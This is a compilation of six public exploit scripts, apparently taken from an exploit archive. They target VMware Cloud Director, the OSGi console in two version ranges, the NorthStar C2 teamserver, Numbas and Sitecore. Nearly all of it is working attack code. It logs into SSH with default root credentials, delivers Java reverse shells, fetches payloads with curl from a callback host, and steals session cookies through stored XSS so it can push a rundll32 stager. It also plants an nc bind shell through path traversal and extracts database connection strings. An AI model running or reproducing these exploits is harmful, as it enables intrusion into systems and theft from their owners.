<pre><code># Exploit Title: [VMware Cloud Director | Bypass identity verification]<br /># Google Dork: [non]<br /># Date: [12/06/2023]<br /># Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)<br /># Version: [10.5]<br /># CVE : [CVE-2023-34060]<br />import requests<br />import paramiko<br />import subprocess<br />import socket<br />import argparse<br />import threading<br /><br /># Define a function to check if a port is open<br />def is_port_open(ip, port):<br /> # Create a socket object<br /> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> # Set the timeout to 1 second<br /> s.settimeout(1)<br /> # Try to connect to the port<br /> try:<br /> s.connect((ip, port))<br /> # The port is open<br /> return True<br /> except:<br /> # The port is closed<br /> return False<br /> finally:<br /> # Close the socket<br /> s.close()<br /><br /># Define a function to exploit a vulnerable device<br />def exploit_device(ip, port, username, password, command):<br /> # Create a ssh client object<br /> client = paramiko.SSHClient()<br /> # Set the policy to accept any host key<br /> client.set_missing_host_key_policy(paramiko.AutoAddPolicy())<br /> # Connect to the target using the credentials<br /> client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)<br /> # Execute the command and get the output<br /> stdin, stdout, stderr = client.exec_command(command)<br /> # Print the output<br /> print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")<br /> # Close the ssh connection<br /> client.close()<br /><br /><br /># Parse the arguments from the user<br />parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")<br />parser.add_argument("ip", help="The target IP address")<br />parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")<br />parser.add_argument("-u", "--username", default="root", help="The username for ssh")<br />parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")<br />parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")<br />args = parser.parse_args()<br /><br /># Loop through the ports and check for the vulnerability<br />for port in args.ports:<br /> # Check if the port is open<br /> if is_port_open(args.ip, port):<br /> # The port is open, send a GET request to the port and check the status code<br /> response = requests.get(f"http://{args.ip}:{port}")<br /> if response.status_code == 200:<br /> # The port is open and vulnerable<br /> print(f"Port {port} is vulnerable to CVE-2023-34060")<br /> # Create a thread to exploit the device<br /> thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))<br /> # Start the thread<br /> thread.start()<br /> else:<br /> # The port is open but not vulnerable<br /> print(f"Port {port} is not vulnerable to CVE-2023-34060")<br /> else:<br /> # The port is closed<br /> print(f"Port {port} is closed")<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/python<br /><br /># Exploit Title: [OSGi v3.7.2 Console RCE]<br /># Date: [2023-07-28]<br /># Exploit Author: [Andrzej Olchawa, Milenko Starcik,<br /># VisionSpace Technologies GmbH]<br /># Exploit Repository:<br /># [https://github.com/visionspacetec/offsec-osgi-exploits.git]<br /># Vendor Homepage: [https://eclipse.dev/equinox]<br /># Software Link: [https://archive.eclipse.org/equinox/]<br /># Version: [3.7.2 and before]<br /># Tested on: [Linux kali 6.3.0-kali1-amd64]<br /># License: [MIT]<br />#<br /># Usage:<br /># python exploit.py --help<br />#<br /># Examples:<br /># python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \<br /># --lport=4444<br />#<br /># python exploit.py --rhost=localhost --rport=1337 --payload= \<br /># "curl http://192.168.100.100/osgi_test"<br /><br /><br />"""<br />This is an exploit that allows to open a reverse shell connection from<br />the system running OSGi v3.7.2 and earlier.<br />"""<br />import argparse<br />import base64<br />import socket<br /><br /><br />def parse():<br /> """<br /> This fnction is used to parse and return command-line arguments.<br /> """<br /><br /> parser = argparse.ArgumentParser(<br /> prog="OSGi-3.7.2-console-RCE",<br /> description="This tool will let you open a reverse shell from the "<br /> "system that is running OSGi with the '-console' "<br /> "option in version 3.7.2 (or before).",<br /> epilog="Happy Hacking! :)",<br /> )<br /><br /> parser.add_argument("--rhost", dest="rhost",<br /> help="remote host", type=str, required=True)<br /> parser.add_argument("--rport", dest="rport",<br /> help="remote port", type=int, required=True)<br /> parser.add_argument("--lhost", dest="lhost",<br /> help="local host", type=str, required=False)<br /> parser.add_argument("--lport", dest="lport",<br /> help="local port", type=int, required=False)<br /> parser.add_argument("--payload", dest="custom_payload",<br /> help="custom payload", type=str, required=False)<br /> parser.add_argument("--version", action="version",<br /> version="%(prog)s 0.1.0")<br /><br /> args = parser.parse_args()<br /><br /> if args.custom_payload and (args.lhost or args.lport):<br /> parser.error(<br /> "either --payload or both --lport and --rport are required.")<br /><br /> return args<br /><br /><br />def generate_payload(lhost, lport, custom_payload):<br /> """<br /> This function generates the whole payload ready for the delivery.<br /> """<br /><br /> payload = ""<br /><br /> if custom_payload:<br /> payload = custom_payload<br /><br /> print("(*) Using custom payload.")<br /> elif lhost and lport:<br /> payload = \<br /> "echo 'import java.io.IOException;import java.io.InputStream;" \<br /> "import java.io.OutputStream;import java.net.Socket;class Rev" \<br /> "Shell {public static void main(String[] args) throws Excepti" \<br /> "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \<br /> "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \<br /> ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \<br /> "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \<br /> "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \<br /> ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \<br /> "e(pe.available()>0)so.write(pe.read());while(si.available()>" \<br /> "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \<br /> ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \<br /> ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (<br /> lhost, lport)<br /><br /> print("(+) Using Java reverse shell payload.")<br /><br /> bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (<br /> base64.b64encode(payload.encode()))<br /><br /> wrapped_payload = b"fork \"%s\"\n" % (bash_payload)<br /><br /> return wrapped_payload<br /><br /><br />def deliver_payload(rhost, rport, payload):<br /> """<br /> This function connects to the target host and delivers the payload.<br /> It returns True if successful; False otherwise.<br /> """<br /><br /> print("(*) Sending payload...")<br /><br /> try:<br /> sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> sock.connect((rhost, rport))<br /> sock.send(payload)<br /> sock.close()<br /> except socket.error as err:<br /> print(f"(-) Could not deliver the payload to {rhost}:{rport}!")<br /> print(err)<br /> return False<br /><br /> return True<br /><br /><br />def main(args):<br /> """<br /> Main function.<br /> """<br /><br /> payload = generate_payload(args.lhost, args.lport, args.custom_payload)<br /><br /> success = deliver_payload(args.rhost, args.rport, payload)<br /> if success:<br /> print("(+) Done.")<br /> else:<br /> print("(-) Finished with errors.")<br /><br /><br />if __name__ == "__main__":<br /> main(parse())<br /> <br /><br /></code></pre>
<pre><code>#!/usr/bin/python<br /><br /># Exploit Title: [OSGi v3.8-3.18 Console RCE]<br /># Date: [2023-07-28]<br /># Exploit Author: [Andrzej Olchawa, Milenko Starcik,<br /># VisionSpace Technologies GmbH]<br /># Exploit Repository:<br /># [https://github.com/visionspacetec/offsec-osgi-exploits.git]<br /># Vendor Homepage: [https://eclipse.dev/equinox]<br /># Software Link: [https://archive.eclipse.org/equinox/]<br /># Version: [3.8 - 3.18]<br /># Tested on: [Linux kali 6.3.0-kali1-amd64]<br /># License: [MIT]<br />#<br /># Usage:<br /># python exploit.py --help<br />#<br /># Example:<br /># python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \<br /># --lport=4444<br /><br />"""<br />This is an exploit that allows to open a reverse shell connection from<br />the system running OSGi v3.8-3.18 and earlier.<br />"""<br />import argparse<br />import socket<br />import sys<br />import threading<br /><br />from functools import partial<br />from http.server import BaseHTTPRequestHandler, HTTPServer<br /><br /># Stage 1 of the handshake message<br />HANDSHAKE_STAGE_1 = \<br /> b"\xff\xfd\x01\xff\xfd" \<br /> b"\x03\xff\xfb\x1f\xff" \<br /> b"\xfa\x1f\x00\x74\x00" \<br /> b"\x37\xff\xf0\xff\xfb" \<br /> b"\x18"<br /><br /># Stage 2 of the handshake message<br />HANDSHAKE_STAGE_2 = \<br /> b"\xff\xfa\x18\x00\x58" \<br /> b"\x54\x45\x52\x4d\x2d" \<br /> b"\x32\x35\x36\x43\x4f" \<br /> b"\x4c\x4f\x52\xff\xf0"<br /><br /># The buffer of this size is enough to handle the telnet handshake<br />BUFFER_SIZE = 2 * 1024<br /><br /><br />class HandlerClass(BaseHTTPRequestHandler):<br /> """<br /> This class overrides the BaseHTTPRequestHandler. It provides a specific<br /> functionality used to deliver a payload to the target host.<br /> """<br /><br /> _lhost: str<br /> _lport: int<br /><br /> def __init__(self, lhost, lport, *args, **kwargs):<br /> self._lhost = lhost<br /> self._lport = lport<br /><br /> super().__init__(*args, **kwargs)<br /><br /> def _set_response(self):<br /> self.send_response(200)<br /> self.send_header("Content-type", "text/html")<br /> self.end_headers()<br /><br /> def do_GET(self): # pylint: disable=C0103<br /> """<br /> This method is responsible for the playload delivery.<br /> """<br /><br /> print("Delivering the payload...")<br /><br /> self._set_response()<br /> self.wfile.write(generate_revshell_payload(<br /> self._lhost, self._lport).encode('utf-8'))<br /><br /> raise KeyboardInterrupt<br /><br /> def log_message(self, format, *args): # pylint: disable=W0622<br /> """<br /> This method redefines a built-in method to suppress<br /> BaseHTTPRequestHandler log messages.<br /> """<br /><br /> return<br /><br /><br />def generate_revshell_payload(lhost, lport):<br /> """<br /> This function generates the Revershe Shell payload that will<br /> be executed on the target host.<br /> """<br /><br /> payload = \<br /> "import java.io.IOException;import java.io.InputStream;" \<br /> "import java.io.OutputStream;import java.net.Socket;" \<br /> "class RevShell {public static void main(String[] args) " \<br /> "throws Exception { String host=\"%s\";int port=%d;" \<br /> "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \<br /> "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \<br /> "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \<br /> "si=s.getInputStream();OutputStream po=p.getOutputStream()," \<br /> "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \<br /> ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \<br /> "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \<br /> "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \<br /> "p.destroy();s.close();}}\n" % (<br /> lhost, lport)<br /><br /> return payload<br /><br /><br />def run_payload_delivery(lhost, lport):<br /> """<br /> This function is responsible for payload delivery.<br /> """<br /><br /> print("Setting up the HTTP server for payload delivery...")<br /><br /> handler_class = partial(HandlerClass, lhost, lport)<br /><br /> server_address = ('', 80)<br /> httpd = HTTPServer(server_address, handler_class)<br /><br /> try:<br /> print("[+] HTTP server is running.")<br /><br /> httpd.serve_forever()<br /> except KeyboardInterrupt:<br /> print("[+] Payload delivered.")<br /> except Exception as err: # pylint: disable=broad-except<br /> print("[-] Failed payload delivery!")<br /> print(err)<br /> finally:<br /> httpd.server_close()<br /><br /><br />def generate_stage_1(lhost):<br /> """<br /> This function generates the stage 1 of the payload.<br /> """<br /><br /> stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (<br /> lhost.encode()<br /> )<br /><br /> return stage_1<br /><br /><br />def generate_stage_2():<br /> """<br /> This function generates the stage 2 of the payload.<br /> """<br /><br /> stage_2 = b"fork \"java ./RevShell.java\"\n"<br /><br /> return stage_2<br /><br /><br />def establish_connection(rhost, rport):<br /> """<br /> This function creates a socket and establishes the connection<br /> to the target host.<br /> """<br /><br /> print("[*] Connecting to OSGi Console...")<br /> sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> sock.connect((rhost, rport))<br /> print("[+] Connected.")<br /><br /> return sock<br /><br /><br />def process_handshake(sock):<br /> """<br /> This function process the handshake with the target host.<br /> """<br /><br /> print("[*] Processing the handshake...")<br /> sock.recv(BUFFER_SIZE)<br /> sock.send(HANDSHAKE_STAGE_1)<br /> sock.recv(BUFFER_SIZE)<br /> sock.send(HANDSHAKE_STAGE_2)<br /> sock.recv(BUFFER_SIZE)<br /> sock.recv(BUFFER_SIZE)<br /><br /><br />def deliver_payload(sock, lhost):<br /> """<br /> This function executes the first stage of the exploitation.<br /> It triggers the payload delivery mechanism to the target host.<br /> """<br /><br /> stage_1 = generate_stage_1(lhost)<br /><br /> print("[*] Triggering the payload delivery...")<br /> sock.send(stage_1)<br /> sock.recv(BUFFER_SIZE)<br /> sock.recv(BUFFER_SIZE)<br /><br /><br />def execute_payload(sock):<br /> """<br /> This function executes the second stage of the exploitation.<br /> It sends payload which is responsible for code execution.<br /> """<br /><br /> stage_2 = generate_stage_2()<br /><br /> print("[*] Executing the payload...")<br /> sock.send(stage_2)<br /> sock.recv(BUFFER_SIZE)<br /> sock.recv(BUFFER_SIZE)<br /> print("[+] Payload executed.")<br /><br /><br />def exploit(args, thread):<br /> """<br /> This function sends the multistaged payload to the tareget host.<br /> """<br /><br /> try:<br /> sock = establish_connection(args.rhost, args.rport)<br /><br /> process_handshake(sock)<br /> deliver_payload(sock, args.lhost)<br /><br /> # Join the thread running the HTTP server<br /> # and wait for payload delivery<br /> thread.join()<br /><br /> execute_payload(sock)<br /><br /> sock.close()<br /><br /> print("[+] Done.")<br /> except socket.error as err:<br /> print("[-] Could not connect!")<br /> print(err)<br /> sys.exit()<br /><br /><br />def parse():<br /> """<br /> This fnction is used to parse and return command-line arguments.<br /> """<br /><br /> parser = argparse.ArgumentParser(<br /> prog="OSGi-3.8-console-RCE",<br /> description="This tool will let you open a reverse shell from the "<br /> "system that is running OSGi with the '-console' "<br /> "option in versions between 3.8 and 3.18.",<br /> epilog="Happy Hacking! :)",<br /> )<br /><br /> parser.add_argument("--rhost", dest="rhost",<br /> help="remote host", type=str, required=True)<br /> parser.add_argument("--rport", dest="rport",<br /> help="remote port", type=int, required=True)<br /> parser.add_argument("--lhost", dest="lhost",<br /> help="local host", type=str, required=False)<br /> parser.add_argument("--lport", dest="lport",<br /> help="local port", type=int, required=False)<br /> parser.add_argument("--version", action="version",<br /> version="%(prog)s 0.1.0")<br /><br /> return parser.parse_args()<br /><br /><br />def main(args):<br /> """<br /> Main fuction.<br /> """<br /><br /> thread = threading.Thread(<br /> target=run_payload_delivery, args=(args.lhost, args.lport))<br /> thread.start()<br /><br /> exploit(args, thread)<br /><br /><br />if __name__ == "__main__":<br /> main(parse())<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: NorthStar C2 agent RCE via stored XSS<br /># Date: 2024-03-11<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/EnginDemirbilek/NorthStarC2<br /># Version: v1.0<br /># Tested on: Ubuntu 20.04 LTS<br /># CVE: CVE-2024-28741<br /># Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This XSS can be leveraged to execute commands on NorthStar C2 agents<br /># Blog: https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/<br />from http.server import BaseHTTPRequestHandler, HTTPServer<br />from bs4 import BeautifulSoup<br />import requests<br />import base64<br />import threading<br />import time<br />import os<br /><br />class Collector(BaseHTTPRequestHandler):<br /> def do_GET(self):<br /> cookie = self.path.split("=")[1]<br /> print("Cookie: " + cookie)<br /> self.send_response(200)<br /> self.end_headers()<br /> self.wfile.write(b"")<br /><br /> background_thread = threading.Thread(target=steal_agents, args=(cookie,))<br /> background_thread.start()<br /><br /> self.server.shutdown()<br /><br />def agent_execute_command(agent_id, csrf_token, headers, command):<br /> data = {<br /> 'slave': agent_id,<br /> 'command': command,<br /> 'sid': agent_id,<br /> 'token': csrf_token<br /> }<br /><br /> r = requests.post(target_url + '/functions/setCommand.nonfunction.php', headers=headers, data=data)<br /><br /> while True:<br /> r = requests.get(target_url + f"/getresponse.php?slave={agent_id}", headers=headers)<br /> if len(r.text) != 0 or command == "die":<br /> break<br /> <br /> time.sleep(1)<br /><br />def steal_agents(cookie):<br /> headers = {<br /> "Cookie": f"PHPSESSID={cookie}"<br /> }<br /> r = requests.get(target_url + "/clients.php", headers=headers)<br /> soup = BeautifulSoup(r.text, 'html.parser')<br /> rows = soup.find_all('tr')<br /><br /> agent_ids = []<br /> hostnames = []<br /><br /> for row in rows:<br /> cells = row.find_all('td')<br /> if len(cells) != 9:<br /> continue<br /><br /> status = cells[7].text.strip()<br /> if status != 'Online':<br /> continue<br /><br /> agent_ids.append(cells[1].text.strip())<br /> hostnames.append(cells[5].text.strip())<br /><br /><br /> script_tags = soup.find_all('script')<br /><br /> csrf_token = None<br /> for script_tag in script_tags:<br /> if 'csrfToken' in script_tag.text:<br /> csrf_token = script_tag.text.split('"')[1]<br /> break<br /><br /> if csrf_token:<br /> print("CSRF Token:", csrf_token)<br /> else:<br /> print("CSRF Token not found")<br /> return<br /><br /> for i in range(len(agent_ids)):<br /> agent_id = agent_ids[i]<br /> hostname = hostnames[i]<br /> print(f"Stealing {hostname} ({agent_id})...")<br /><br /> print("Enabling shell mode")<br /> agent_execute_command(agent_id, csrf_token, headers, "enablecmd")<br /> print(f"Running sliver cradle: {cradle_command}")<br /> agent_execute_command(agent_id, csrf_token, headers, cradle_command)<br /> print("Disabling shell mode")<br /> agent_execute_command(agent_id, csrf_token, headers, "disablecmd")<br /> print("Sending suicide to slave")<br /> agent_execute_command(agent_id, csrf_token, headers, "die")<br /><br /> <br /> print("Exploit finished, exiting")<br /> os._exit(0)<br /><br /><br />def xor_encryption(text, key):<br /> encrypted_text = ""<br /> <br /> for i in range(len(text)):<br /> encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))<br /> <br /> return encrypted_text<br /><br />def generate_sid(sid):<br /> encrypted_sid = xor_encryption(sid, "northstar")<br /><br /> return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()<br /><br />def exploit(target_url, callback_url):<br /> target_url = target_url.rstrip("/") + "/login.php"<br /><br /> protocol = callback_url.split(":")[0] + "://"<br /> host = callback_url.split("/")[2].split(":")[0]<br /> h1, h2 = host[:len(host)//2], host[len(host)//2:]<br /> <br /> if callback_url.count(":") == 2:<br /> port = callback_url.split(":")[2]<br /> else:<br /> if protocol == "https://":<br /> port = "443"<br /> else:<br /> port = "80"<br /><br /> sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]<br /> for sid in sid_payloads:<br /> print(sid)<br /> params = {<br /> 'sid': generate_sid(sid)<br /> }<br /><br /> requests.get(target_url, params=params, verify=False)<br /><br />def run(port):<br /> server_address = ('', int(port))<br /> httpd = HTTPServer(server_address, Collector)<br /> print(f'Server running on port {port}')<br /> httpd.serve_forever()<br /><br />cradle_command = r"curl http://192.168.1.6:8000/stager.dll > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"<br /><br />callback_host = "192.168.1.6"<br />callback_port = "8080"<br /><br />target_url = "http://192.168.1.4:80"<br />callback_url = f"http://{callback_host}:{callback_port}"<br /><br />print("Sending malicious agent registrations...")<br />exploit(target_url, callback_url)<br />print("Registrations finished, waiting for execution...")<br />run(callback_port)<br /></code></pre>
<pre><code># Exploit Title: Numbas < v7.3 - Remote Code Execution<br /># Google Dork: N/A<br /># Date: March 7th, 2024<br /># Exploit Author: Matheus Boschetti<br /># Vendor Homepage: https://www.numbas.org.uk/<br /># Software Link: https://github.com/numbas/Numbas<br /># Version: 7.2 and below<br /># Tested on: Linux<br /># CVE: CVE-2024-27612<br /><br />import sys, requests, re, argparse, subprocess, time<br />from bs4 import BeautifulSoup<br /><br />s = requests.session()<br /><br />def getCSRF(target):<br /> url = f"http://{target}/"<br /> req = s.get(url)<br /> soup = BeautifulSoup(req.text, 'html.parser')<br /> csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']<br /> return csrfmiddlewaretoken<br /><br />def createTheme(target):<br /> # Format request<br /> csrfmiddlewaretoken = getCSRF(target)<br /> theme = 'ExampleTheme'<br /> boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'<br /> data = (<br /> f'--{boundary}\r\n'<br /> 'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'<br /> '\r\n'<br /> f'{csrfmiddlewaretoken}\r\n'<br /> f'--{boundary}\r\n'<br /> 'Content-Disposition: form-data; name="name"\r\n'<br /> '\r\n'<br /> f'{theme}\r\n'<br /> f'--{boundary}--\r\n'<br /> )<br /> headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',<br /> 'User-Agent': 'Mozilla/5.0',<br /> 'Accept': '*/*',<br /> 'Connection': 'close'}<br /><br /> # Create theme and return its ID<br /> req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)<br /> redir = req.url<br /> split = redir.split('/')<br /> id = split[4]<br /> print(f"\t[i] Theme created with ID {id}")<br /> return id<br /><br />def login(target, user, passwd):<br /> print("\n[i] Attempting to login...")<br /><br /> csrfmiddlewaretoken = getCSRF(target)<br /> data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,<br /> 'username': user,<br /> 'password': passwd,<br /> 'next': '/'}<br /> <br /> # Login<br /> login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)<br /> res = login.text<br /> if("Logged in as" not in res):<br /> print("\n\n[!] Login failed!")<br /> sys.exit(-1)<br /><br /> # Check if logged and fetch ID<br /> usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)<br /> if usermatch:<br /> user = usermatch.group(1)<br /> idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)<br /> if idmatch:<br /> id = idmatch.group(1)<br /> print(f"\t[+] Logged in as \"{user}\" with ID {id}")<br /><br />def checkVuln(url):<br /> print("[i] Checking if target is vulnerable...")<br /><br /> # Attempt to read files<br /> themeID = createTheme(url)<br /> target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."<br /> hname = s.get(f"{target}/etc/hostname")<br /> ver = s.get(f"{target}/etc/issue")<br /> hnamesoup = BeautifulSoup(hname.text, 'html.parser')<br /> versoup = BeautifulSoup(ver.text, 'html.parser')<br /> hostname = hnamesoup.find('textarea').get_text().strip()<br /> version = versoup.find('textarea').get_text().strip()<br /> if len(hostname) < 1:<br /> print("\n\n[!] Something went wrong - target might not be vulnerable.")<br /> sys.exit(-1)<br /> print(f"\n[+] Target \"{hostname}\" is vulnerable!")<br /> print(f"\t[i] Running: \"{version}\"")<br /><br /> # Cleanup - delete theme<br /> print(f"\t\t[i] Cleanup: deleting theme {themeID}...")<br /> target = f"http://{url}/themes/{themeID}/delete"<br /> csrfmiddlewaretoken = getCSRF(url)<br /> data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}<br /> s.post(target, data=data)<br /><br /><br />def replaceInit(target):<br /> # Overwrite __init__.py with arbitrary code<br /> rport = '8443'<br /> payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"<br /> csrfmiddlewaretoken = getCSRF(target)<br /> filename = '../../../../numbas_editor/numbas/__init__.py'<br /> themeID = createTheme(target)<br /> data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,<br /> 'source': payload,<br /> 'filename': filename}<br /><br /> print("[i] Delivering payload...")<br /> # Retry 5 times in case something goes wrong...<br /> for attempt in range(5):<br /> try:<br /> s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)<br /> except Exception as e:<br /> pass<br /> <br /> # Establish connection to bind shell<br /> time.sleep(2)<br /> print(f"\t[+] Payload delivered, establishing connection...\n")<br /> if ":" in target:<br /> split = target.split(":")<br /> ip = split[0]<br /> else:<br /> ip = str(target)<br /> subprocess.Popen(["nc", "-n", ip, rport])<br /> while True:<br /> pass<br /><br /><br />def main():<br /> parser = argparse.ArgumentParser()<br /> if len(sys.argv) <= 1:<br /> print("\n[!] No option provided!")<br /> print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")<br /> print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")<br /> sys.exit(-1)<br /><br /> group = parser.add_mutually_exclusive_group(required=True)<br /> group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')<br /> parser.add_argument('--target', help='Target IP:PORT')<br /> parser.add_argument('--user', help='Username to authenticate')<br /> parser.add_argument('--passwd', help='Password to authenticate')<br /> args = parser.parse_args()<br /> action = args.action<br /> target = args.target<br /> user = args.user<br /> passwd = args.passwd<br /><br /> print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")<br /> <br /> if action == 'check':<br /> login(target, user, passwd)<br /> checkVuln(target)<br /> elif action == 'exploit':<br /> login(target, user, passwd)<br /> replaceInit(target)<br /> else:<br /> sys.exit(-1)<br /><br /><br />if __name__ == "__main__":<br /> main()<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br /># Exploit Title: Sitecore - Remote Code Execution v8.2 <br /># Exploit Author: abhishek morla<br /># Google Dork: N/A<br /># Date: 2024-01-08<br /># Vendor Homepage: https://www.sitecore.com/<br /># Software Link: https://dev.sitecore.net/<br /># Version: 10.3<br /># Tested on: windows64bit / mozila firefox <br /># CVE : CVE-2023-35813<br /># The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted<br /># Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09<br /># Video POC : https://youtu.be/vWKl9wgdTB0<br /><br />import argparse<br />import requests<br />from urllib.parse import quote<br />from rich.console import Console<br /><br />console = Console()<br />def initial_test(hostname):<br /> # Initial payload to test vulnerability<br /> test_payload = '''<br /> <%@Register<br /> TagPrefix = 'x'<br /> Namespace = 'System.Runtime.Remoting.Services'<br /> Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'<br /> %><br /> <x:RemotingService runat='server'<br /> Context-Response-ContentType='TestVulnerability'<br /> /><br /> '''<br /> encoded_payload = quote(test_payload)<br /><br /> url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"<br /> headers = {"Content-Type": "application/x-www-form-urlencoded"}<br /> data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)<br /><br /> response = requests.post(url, headers=headers, data=data, verify=False)<br /><br /> # Check for the test string in the Content-Type of the response<br /> return 'TestVulnerability' in response.headers.get('Content-Type', '')<br /><br />def get_payload(choice):<br /> # Payload templates for different options<br /> payloads = {<br /> '1': "<%$ ConnectionStrings:core %>",<br /> '2': "<%$ ConnectionStrings:master %>",<br /> '3': "<%$ ConnectionStrings:web %>"<br /> }<br /><br /> base_payload = '''<br /> <%@Register<br /> TagPrefix = 'x'<br /> Namespace = 'System.Runtime.Remoting.Services'<br /> Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'<br /> %><br /> <x:RemotingService runat='server'<br /> Context-Response-ContentType='{}'<br /> /><br /> '''<br /><br /> return base_payload.format(payloads.get(choice, "Invalid"))<br /><br />def main(hostname):<br /> if initial_test(hostname):<br /> print("Exploiting, Please wait...")<br /> console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")<br /> print("Select the payload to use:")<br /> print("1: Core connection strings")<br /> print("2: Master connection strings")<br /> print("3: Web connection strings")<br /> payload_choice = input("Enter your choice (1, 2, or 3): ")<br /><br /> payload = get_payload(payload_choice)<br /> encoded_payload = quote(payload)<br /><br /> url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"<br /> headers = {"Content-Type": "application/x-www-form-urlencoded"}<br /> data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)<br /><br /> response = requests.post(url, headers=headers, data=data)<br /><br /> if 'Content-Type' in response.headers:<br /> print("Content-Type from the response header:")<br /> print("\n")<br /> print(response.headers['Content-Type'])<br /> else:<br /> print("No Content-Type in the response header. Status Code:", response.status_code)<br /> else:<br /> print("The target does not appear to be vulnerable to CVE-2023-35813.")<br /><br /><br />if __name__ == "__main__":<br /> console.print("[bold green]Author: Abhishek Morla[/bold green]")<br /> console.print("[bold red]CVE-2023-35813[/bold red]")<br /> parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')<br /> parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')<br /> args = parser.parse_args()<br /><br /> main(args.hostname)<br /> <br /><br /></code></pre>
